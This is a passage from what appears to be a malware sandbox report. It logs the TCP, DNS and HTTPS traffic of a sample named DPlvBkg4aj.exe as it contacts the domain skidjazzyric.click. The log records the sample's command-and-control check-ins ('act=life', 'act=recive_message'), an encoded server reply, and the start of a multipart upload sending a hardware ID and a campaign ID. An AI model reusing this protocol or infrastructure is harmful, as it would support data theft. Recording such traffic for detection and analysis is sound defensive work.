Jan 9, 2025 08:13:27.692754984 CET	443	49731	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:27.692797899 CET	49731	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:27.692882061 CET	49731	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:27.692893028 CET	443	49731	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:27.692907095 CET	49731	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:27.692910910 CET	443	49731	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:27.840567112 CET	49732	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:27.840590954 CET	443	49732	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:27.840667963 CET	49732	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:27.840987921 CET	49732	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:27.840998888 CET	443	49732	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:28.296020031 CET	443	49732	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:28.296133041 CET	49732	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:28.297568083 CET	49732	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:28.297575951 CET	443	49732	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:28.297799110 CET	443	49732	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:28.298955917 CET	49732	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:28.299108982 CET	49732	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:28.299139023 CET	443	49732	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:28.299202919 CET	49732	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:28.299207926 CET	443	49732	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:28.914251089 CET	443	49732	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:28.914345980 CET	443	49732	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:28.914422035 CET	49732	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:28.914630890 CET	49732	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:28.914640903 CET	443	49732	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:29.031852007 CET	49733	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:29.031917095 CET	443	49733	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:29.032002926 CET	49733	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:29.032306910 CET	49733	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:29.032330990 CET	443	49733	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:29.507266998 CET	443	49733	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:29.507462025 CET	49733	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:29.508992910 CET	49733	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:29.509006977 CET	443	49733	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:29.509254932 CET	443	49733	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:29.510639906 CET	49733	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:29.510777950 CET	49733	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:29.510809898 CET	443	49733	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:29.985869884 CET	443	49733	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:29.985946894 CET	443	49733	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:29.985996008 CET	49733	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:29.987490892 CET	49733	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:29.987515926 CET	443	49733	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:30.522289991 CET	49734	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:30.522344112 CET	443	49734	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:30.522414923 CET	49734	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:30.522913933 CET	49734	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:30.522927999 CET	443	49734	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:30.973004103 CET	443	49734	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:30.973084927 CET	49734	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:30.974205971 CET	49734	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:30.974220037 CET	443	49734	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:30.974423885 CET	443	49734	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:30.975440025 CET	49734	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:30.975588083 CET	49734	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:30.975617886 CET	443	49734	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:30.975691080 CET	49734	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:30.975699902 CET	443	49734	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:31.651222944 CET	443	49734	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:31.651324034 CET	443	49734	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:31.651417971 CET	49734	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:31.651680946 CET	49734	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:31.651695013 CET	443	49734	104.21.112.1	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 08:13:25.500952005 CET	56690	53	192.168.2.4	1.1.1.1
Jan 9, 2025 08:13:25.515244007 CET	53	56690	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 9, 2025 08:13:25.500952005 CET	192.168.2.4	1.1.1.1	0x7951	Standard query (0)	skidjazzyric.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 9, 2025 08:13:25.515244007 CET	1.1.1.1	192.168.2.4	0x7951	No error (0)	skidjazzyric.click	104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:13:25.515244007 CET	1.1.1.1	192.168.2.4	0x7951	No error (0)	skidjazzyric.click	104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:13:25.515244007 CET	1.1.1.1	192.168.2.4	0x7951	No error (0)	skidjazzyric.click	104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:13:25.515244007 CET	1.1.1.1	192.168.2.4	0x7951	No error (0)	skidjazzyric.click	104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:13:25.515244007 CET	1.1.1.1	192.168.2.4	0x7951	No error (0)	skidjazzyric.click	104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:13:25.515244007 CET	1.1.1.1	192.168.2.4	0x7951	No error (0)	skidjazzyric.click	104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:13:25.515244007 CET	1.1.1.1	192.168.2.4	0x7951	No error (0)	skidjazzyric.click	104.21.96.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

skidjazzyric.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.21.112.1	443	1068	C:\Users\user\Desktop\DPlvBkg4aj.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 07:13:26 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: skidjazzyric.click
2025-01-09 07:13:26 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-09 07:13:26 UTC	1127	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 07:13:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hp99mnclap15s7t1v1ndqkku06; expires=Mon, 05 May 2025 01:00:05 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AQm12xm7G8oKRf7LorIZwpehafjdePoqmAVwILzlqLTBXiCgMa5olWWA%2B6rc8UTrQp4cjNs75AITfn6m1eYWtC%2FotzoVaLbe7BxKPoWmhPZnI8p2TE0FtxKZJXShKUi%2BCjoalNI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff29feb8cb943b3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1556&min_rtt=1534&rtt_var=620&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3056&recv_bytes=909&delivery_rate=2552447&cwnd=204&unsent_bytes=0&cid=29156cb439e9df28&ts=699&x=0"
2025-01-09 07:13:26 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-09 07:13:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	104.21.112.1	443	1068	C:\Users\user\Desktop\DPlvBkg4aj.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 07:13:27 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 74 Host: skidjazzyric.click
2025-01-09 07:13:27 UTC	74	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 31 34 34 38 62 62 36 32 65 31 32 37 36 38 32 31 64 35 30 32 34 36 65 62 38 38 62 33 31 30 39 66 Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=1448bb62e1276821d50246eb88b3109f
2025-01-09 07:13:27 UTC	1127	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 07:13:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hr624b1n9qg5au3rfc41qmbvr3; expires=Mon, 05 May 2025 01:00:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sTU87VSEOwdY08bfOOu4lRdGNgFpKnevh4GKKffR1HHq4K4eHN7gjYtJhrsDZlzyJdzeXUIplrJsJdXbNOe6WzOJAw1dM1mUeqWm%2FFjpUdz34nKMx2kD30WrF%2F1RiKRaZDgcs%2BI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff29ff13cc8c34f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1481&min_rtt=1476&rtt_var=564&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3057&recv_bytes=976&delivery_rate=2881578&cwnd=182&unsent_bytes=0&cid=7177cae037568f51&ts=448&x=0"
2025-01-09 07:13:27 UTC	242	IN	Data Raw: 31 63 61 63 0d 0a 75 74 53 32 34 6d 2f 4e 74 75 2b 4c 61 55 61 6e 54 59 6e 43 6a 6a 41 39 41 7a 68 48 70 54 41 55 43 6a 38 4c 63 4d 4d 2f 33 4d 33 42 39 73 44 41 56 66 6d 61 7a 66 67 4d 5a 4a 30 35 2b 37 66 72 48 42 39 69 58 47 57 66 56 6e 56 6d 54 47 35 63 34 55 6d 78 37 34 43 79 31 34 34 63 71 4a 72 4e 37 68 46 6b 6e 52 62 79 34 4f 74 65 48 7a 6b 61 49 73 39 53 64 57 5a 64 61 68 75 73 54 37 43 75 30 72 6a 52 69 67 71 75 30 6f 37 6e 42 43 50 43 4b 4f 69 6f 34 46 6c 51 61 31 56 6c 69 52 4a 78 63 42 30 78 55 6f 35 61 71 4b 7a 33 74 63 57 4a 54 62 43 61 6c 4b 6b 4d 4b 49 56 33 71 36 50 72 55 6c 46 6c 58 43 7a 4e 57 48 78 75 58 47 38 61 73 31 61 36 70 64 4b 32 30 6f 73 41 70 38 61 44 37 51 4d 6f 78 43 4c 6f 34 4b 49 53 Data Ascii: 1cacutS24m/Ntu+LaUanTYnCjjA9AzhHpTAUCj8LcMM/3M3B9sDAVfmazfgMZJ05+7frHB9iXGWfVnVmTG5c4Umx74Cy144cqJrN7hFknRby4OteHzkaIs9SdWZdahusT7Cu0rjRigqu0o7nBCPCKOio4FlQa1VliRJxcB0xUo5aqKz3tcWJTbCalKkMKIV3q6PrUlFlXCzNWHxuXG8as1a6pdK20osAp8aD7QMoxCLo4KIS
2025-01-09 07:13:27 UTC	1369	IN	Data Raw: 57 48 6b 61 66 59 63 42 52 47 74 4d 65 41 65 73 54 62 6a 76 78 2f 6a 4e 77 41 71 6a 6c 4e 57 70 41 79 6a 4c 4b 75 69 76 36 31 4e 66 63 31 55 6c 78 46 70 2b 62 46 64 6d 48 61 35 54 74 4b 6a 51 76 39 4f 50 43 71 66 53 67 75 70 4c 61 6f 55 6f 38 2b 43 30 45 6e 39 78 57 53 62 54 58 32 63 6f 51 69 63 4c 34 56 71 79 37 34 44 32 30 6f 34 4d 6f 74 53 66 34 51 41 76 77 44 33 67 71 65 46 66 58 32 78 51 4b 73 52 53 63 57 4a 58 5a 68 69 6c 55 4c 4f 70 32 4c 61 55 7a 6b 32 6f 7a 4d 32 78 53 77 66 41 50 2b 79 73 2b 68 42 6c 49 55 56 72 33 68 4a 78 5a 42 30 78 55 71 6c 59 76 61 7a 54 75 64 65 49 42 72 33 55 6e 2b 38 47 49 64 63 70 37 71 37 6d 55 55 31 72 56 43 50 45 57 33 31 68 57 47 34 57 34 52 50 2b 71 4d 44 32 6a 4d 41 73 6f 74 2b 42 34 78 77 6b 68 54 43 6c 75 61 78 Data Ascii: WHkafYcBRGtMeAesTbjvx/jNwAqjlNWpAyjLKuiv61Nfc1UlxFp+bFdmHa5TtKjQv9OPCqfSgupLaoUo8+C0En9xWSbTX2coQicL4Vqy74D20o4MotSf4QAvwD3gqeFfX2xQKsRScWJXZhilULOp2LaUzk2ozM2xSwfAP+ys+hBlIUVr3hJxZB0xUqlYvazTudeIBr3Un+8GIdcp7q7mUU1rVCPEW31hWG4W4RP+qMD2jMAsot+B4xwkhTCluax
2025-01-09 07:13:27 UTC	1369	IN	Data Raw: 43 50 49 58 33 6f 6f 45 79 6b 56 75 52 33 6d 37 2f 4b 31 77 49 4d 48 37 65 47 4f 35 77 55 6a 30 32 2f 30 37 76 55 53 57 47 30 61 66 59 64 66 64 32 42 62 65 78 32 73 58 72 43 68 31 37 50 62 69 41 32 76 32 59 6a 74 41 43 2f 47 49 75 2b 79 35 6c 4a 58 5a 46 73 76 7a 52 49 34 4b 46 70 78 55 76 6b 64 6a 37 6a 54 39 4f 47 44 41 36 48 54 6d 36 6b 55 61 74 78 76 37 4b 79 73 43 68 39 73 55 69 44 43 58 58 64 69 55 32 77 59 72 56 57 77 72 4d 71 35 30 49 41 42 70 39 36 41 35 77 38 73 7a 43 54 67 70 75 78 54 56 53 45 55 5a 63 42 4b 4e 6a 41 64 58 52 57 74 55 4c 48 74 37 62 58 61 6a 67 71 35 6c 4a 4b 6e 45 6d 54 43 49 36 76 34 72 46 35 57 59 56 45 76 77 31 4a 78 5a 56 68 71 46 61 4a 51 75 61 58 57 73 64 43 4d 42 4b 4c 53 6a 65 34 50 49 64 63 71 34 71 7a 67 45 68 45 68 Data Ascii: CPIX3ooEykVuR3m7/K1wIMH7eGO5wUj02/07vUSWG0afYdfd2Bbex2sXrCh17PbiA2v2YjtAC/GIu+y5lJXZFsvzRI4KFpxUvkdj7jT9OGDA6HTm6kUatxv7KysCh9sUiDCXXdiU2wYrVWwrMq50IABp96A5w8szCTgpuxTVSEUZcBKNjAdXRWtULHt7bXajgq5lJKnEmTCI6v4rF5WYVEvw1JxZVhqFaJQuaXWsdCMBKLSje4PIdcq4qzgEhEh
2025-01-09 07:13:27 UTC	1369	IN	Data Raw: 78 76 4b 46 70 6c 55 76 6b 64 74 36 62 4b 75 4e 71 4a 41 4b 6e 63 69 75 63 47 4c 38 4d 6b 37 4b 66 71 58 31 64 73 58 79 62 47 56 6e 78 36 58 6d 49 59 72 46 66 2b 34 5a 69 78 7a 4d 42 56 37 2f 4f 42 77 42 73 2f 31 7a 6d 72 76 36 4a 4c 48 32 5a 57 5a 5a 38 53 64 57 64 55 5a 68 71 70 55 72 47 72 31 72 44 53 6a 51 69 67 33 70 2f 68 42 53 6e 4f 49 4f 43 79 37 46 39 62 62 56 34 74 7a 46 67 32 4a 68 31 75 43 75 45 46 2f 70 72 56 75 64 53 44 47 2b 2f 4c 77 2f 42 4c 49 38 6c 76 73 2b 44 67 58 46 39 75 56 69 6e 4d 57 6e 64 6b 55 32 34 58 71 46 57 32 76 64 6d 79 33 49 45 44 6f 4e 57 4a 37 41 34 67 77 69 76 74 72 36 77 63 48 32 5a 43 5a 5a 38 53 57 55 39 6f 4b 7a 4f 62 48 61 48 68 77 66 62 54 6a 45 33 33 6c 49 48 71 42 79 7a 4b 4b 65 4b 73 35 6c 74 55 62 56 45 68 79 Data Ascii: xvKFplUvkdt6bKuNqJAKnciucGL8Mk7KfqX1dsXybGVnx6XmIYrFf+4ZixzMBV7/OBwBs/1zmrv6JLH2ZWZZ8SdWdUZhqpUrGr1rDSjQig3p/hBSnOIOCy7F9bbV4tzFg2Jh1uCuEF/prVudSDG+/Lw/BLI8lvs+DgXF9uVinMWndkU24XqFW2vdmy3IEDoNWJ7A4gwivtr6wcH2ZCZZ8SWU9oKzObHaHhwfbTjE33lIHqByzKKeKs5ltUbVEhy
2025-01-09 07:13:27 UTC	1369	IN	Data Raw: 53 61 42 4f 6e 54 37 6d 6d 79 72 6a 5a 6a 77 57 6e 33 59 7a 74 44 69 6e 44 49 2b 47 68 36 31 78 52 61 52 70 72 68 31 56 75 4b 41 55 70 4d 37 46 47 72 4c 6e 56 6c 39 6d 50 54 62 43 61 6c 4b 6b 4d 4b 49 56 33 71 36 6e 2b 56 6c 4a 7a 55 79 4c 4a 58 58 56 36 58 47 51 5a 73 31 71 78 71 39 2b 36 30 6f 38 4c 72 74 47 48 35 51 77 68 7a 69 44 6e 34 4b 49 53 57 48 6b 61 66 59 64 38 66 58 74 4b 61 68 79 71 53 36 58 76 78 2f 6a 4e 77 41 71 6a 6c 4e 57 70 43 43 2f 4f 4b 2b 75 73 37 46 5a 53 59 55 67 71 77 46 56 2f 59 30 39 6a 46 61 5a 57 74 71 54 58 73 4d 61 4d 41 37 33 52 6e 2f 74 4c 61 6f 55 6f 38 2b 43 30 45 6d 6c 6d 53 6a 58 45 45 45 64 2b 58 6e 38 5a 72 46 48 2b 73 4a 61 76 6c 49 63 42 37 34 7a 4e 37 77 51 74 78 69 44 71 71 65 42 66 57 6d 68 66 4a 4d 46 57 66 47 Data Ascii: SaBOnT7mmyrjZjwWn3YztDinDI+Gh61xRaRprh1VuKAUpM7FGrLnVl9mPTbCalKkMKIV3q6n+VlJzUyLJXXV6XGQZs1qxq9+60o8LrtGH5QwhziDn4KISWHkafYd8fXtKahyqS6Xvx/jNwAqjlNWpCC/OK+us7FZSYUgqwFV/Y09jFaZWtqTXsMaMA73Rn/tLaoUo8+C0EmlmSjXEEEd+Xn8ZrFH+sJavlIcB74zN7wQtxiDqqeBfWmhfJMFWfG
2025-01-09 07:13:27 UTC	1369	IN	Data Raw: 34 55 4c 77 74 70 69 78 32 4d 42 56 37 39 65 4b 36 67 6f 75 7a 43 50 6b 70 2b 68 41 56 57 5a 49 4a 4d 5a 5a 65 32 52 64 5a 42 2b 72 58 4c 65 69 31 4c 76 54 68 77 4b 71 6c 4d 4f 70 44 44 79 46 64 36 75 42 34 56 6c 54 4f 67 42 6c 32 42 78 76 4b 46 70 6c 55 76 6b 64 76 71 58 64 76 4e 6d 44 41 71 7a 47 6a 4f 38 5a 4a 4d 67 6c 2b 61 72 6e 56 31 4a 73 56 79 62 42 56 48 31 6b 54 32 41 53 6f 6c 62 2b 34 5a 69 78 7a 4d 42 56 37 2f 65 61 2f 77 45 6a 79 54 6e 67 6f 65 39 45 55 6e 45 61 61 34 64 44 63 58 6b 64 4d 51 53 78 53 72 6d 77 6c 71 2b 55 68 77 48 76 6a 4d 33 76 41 69 4c 43 4b 65 57 79 36 56 52 51 62 6c 4d 73 77 31 70 31 61 46 6c 74 46 61 52 65 73 71 54 66 74 64 75 45 42 4b 48 64 67 71 6c 46 5a 4d 49 33 71 2f 69 73 63 30 52 69 56 69 69 48 54 54 68 78 48 57 34 Data Ascii: 4ULwtpix2MBV79eK6gouzCPkp+hAVWZIJMZZe2RdZB+rXLei1LvThwKqlMOpDDyFd6uB4VlTOgBl2BxvKFplUvkdvqXdvNmDAqzGjO8ZJMgl+arnV1JsVybBVH1kT2ASolb+4ZixzMBV7/ea/wEjyTngoe9EUnEaa4dDcXkdMQSxSrmwlq+UhwHvjM3vAiLCKeWy6VRQblMsw1p1aFltFaResqTftduEBKHdgqlFZMI3q/isc0RiViiHTThxHW4
2025-01-09 07:13:27 UTC	261	IN	Data Raw: 75 2b 41 39 76 53 4c 47 36 72 54 6d 36 73 2b 4a 38 73 68 37 4c 61 73 54 57 41 76 47 69 53 48 43 6b 39 78 48 58 39 53 2b 51 2f 77 37 38 72 32 6a 4d 42 4b 72 4d 61 66 37 77 67 79 78 6d 6a 56 6e 73 74 45 56 57 5a 4b 49 74 42 64 4e 69 59 64 5a 6c 4c 35 5a 50 36 6d 33 36 33 46 6c 67 43 2f 30 38 33 57 52 57 54 64 62 37 50 67 32 56 46 52 62 31 30 7a 31 68 39 52 66 6c 64 75 41 71 5a 4b 73 65 2b 57 39 74 4c 41 56 66 79 61 7a 65 30 61 5a 4a 31 2f 75 66 75 35 41 51 67 78 43 44 71 4a 53 7a 5a 2b 48 54 46 41 37 78 32 73 37 34 44 32 6b 34 4d 66 76 64 4b 4f 2f 77 68 6a 2b 78 48 4d 75 75 46 55 53 48 42 6b 47 38 42 49 65 32 35 4b 65 46 36 30 58 72 43 68 33 36 43 55 7a 6b 32 67 6c 4e 58 51 53 32 79 46 45 4b 58 67 39 42 49 48 49 57 38 6d 79 56 78 78 66 6b 77 6b 4e 62 74 51 Data Ascii: u+A9vSLG6rTm6s+J8sh7LasTWAvGiSHCk9xHX9S+Q/w78r2jMBKrMaf7wgyxmjVnstEVWZKItBdNiYdZlL5ZP6m363FlgC/083WRWTdb7Pg2VFRb10z1h9RflduAqZKse+W9tLAVfyaze0aZJ1/ufu5AQgxCDqJSzZ+HTFA7x2s74D2k4MfvdKO/whj+xHMuuFUSHBkG8BIe25KeF60XrCh36CUzk2glNXQS2yFEKXg9BIHIW8myVxxfkwkNbtQ
2025-01-09 07:13:27 UTC	1369	IN	Data Raw: 32 66 65 34 0d 0a 39 70 72 41 43 2b 2b 4d 33 61 64 4c 49 4e 52 76 73 2f 43 2b 43 51 6f 79 44 58 57 56 54 54 68 78 48 58 39 53 2b 51 2f 77 37 38 72 32 6a 4d 42 4b 72 4d 61 66 37 77 67 79 78 6d 6a 56 6e 73 4a 56 57 57 52 64 4e 59 56 38 66 58 78 61 4b 56 7a 68 55 76 37 33 34 66 61 63 77 44 4c 68 6c 4a 57 70 55 32 54 77 4c 4f 57 75 36 30 52 4f 4c 48 51 69 77 56 64 78 65 42 39 48 47 62 56 61 2f 75 47 59 73 4a 54 59 58 65 47 55 69 66 68 4c 66 4a 56 39 73 50 57 2f 42 51 38 7a 52 57 76 65 45 6d 41 6f 42 54 74 63 34 55 2f 2b 39 35 6a 78 31 35 49 66 71 64 65 62 36 6b 77 61 2b 79 7a 39 72 65 4e 5a 58 6c 39 6b 43 38 70 54 64 57 59 66 57 41 53 73 54 62 32 71 33 34 6a 71 6a 67 71 37 30 34 50 76 43 32 53 4c 62 2b 54 67 74 47 73 66 4b 52 6f 61 69 52 4a 75 4b 41 55 70 4a Data Ascii: 2fe49prAC++M3adLINRvs/C+CQoyDXWVTThxHX9S+Q/w78r2jMBKrMaf7wgyxmjVnsJVWWRdNYV8fXxaKVzhUv734facwDLhlJWpU2TwLOWu60ROLHQiwVdxeB9HGbVa/uGYsJTYXeGUifhLfJV9sPW/BQ8zRWveEmAoBTtc4U/+95jx15Ifqdeb6kwa+yz9reNZXl9kC8pTdWYfWASsTb2q34jqjgq704PvC2SLb+TgtGsfKRoaiRJuKAUpJ
2025-01-09 07:13:27 UTC	1369	IN	Data Raw: 77 6c 71 2b 55 6c 6b 33 33 68 73 4f 70 47 57 53 64 62 36 79 6a 2f 6b 42 5a 59 6b 77 6d 67 47 78 49 54 31 4e 75 45 37 64 4e 73 36 50 35 74 63 57 4b 4d 35 48 42 6a 75 63 46 49 39 4d 2b 71 2b 36 73 58 52 38 35 59 32 57 50 45 6b 6b 6d 48 58 46 53 2b 52 32 4c 72 4e 61 34 30 35 59 63 34 76 4f 44 37 67 6f 79 31 53 4c 6e 67 65 39 44 56 53 45 55 5a 63 45 53 4c 6a 6f 54 4b 52 61 77 48 65 62 2f 69 75 32 42 30 31 72 2f 68 70 4b 6e 45 6d 54 54 62 37 50 79 6f 68 4a 4e 49 51 4a 6c 67 46 46 6b 65 6c 74 71 42 4b 49 61 67 4a 48 39 6f 64 65 51 43 36 7a 71 73 38 49 48 49 73 49 31 37 4b 62 4b 63 68 38 76 47 69 71 48 43 6b 38 6f 46 53 6b 74 37 78 32 6d 37 34 44 32 34 59 4d 44 6f 64 4f 62 2b 45 59 42 30 69 7a 37 70 75 38 53 45 53 46 63 5a 5a 38 43 4f 43 68 5a 65 46 4c 35 44 65 Data Ascii: wlq+Ulk33hsOpGWSdb6yj/kBZYkwmgGxIT1NuE7dNs6P5tcWKM5HBjucFI9M+q+6sXR85Y2WPEkkmHXFS+R2LrNa405Yc4vOD7goy1SLnge9DVSEUZcESLjoTKRawHeb/iu2B01r/hpKnEmTTb7PyohJNIQJlgFFkeltqBKIagJH9odeQC6zqs8IHIsI17KbKch8vGiqHCk8oFSkt7x2m74D24YMDodOb+EYB0iz7pu8SESFcZZ8COChZeFL5De

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	104.21.112.1	443	1068	C:\Users\user\Desktop\DPlvBkg4aj.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 07:13:28 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6V7YNM87GSBM75 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18134 Host: skidjazzyric.click
2025-01-09 07:13:28 UTC	15331	OUT	Data Raw: 2d 2d 36 56 37 59 4e 4d 38 37 47 53 42 4d 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 42 33 30 39 42 36 33 39 43 32 32 37 36 38 46 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 36 56 37 59 4e 4d 38 37 47 53 42 4d 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 56 37 59 4e 4d 38 37 47 53 42 4d 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 36 56 37 59 4e 4d 38 37 47 53 42 4d 37 Data Ascii: --6V7YNM87GSBM75Content-Disposition: form-data; name="hwid"2B309B639C22768FD0632DF0E28DC412--6V7YNM87GSBM75Content-Disposition: form-data; name="pid"2--6V7YNM87GSBM75Content-Disposition: form-data; name="lid"4h5VfH----6V7YNM87GSBM7
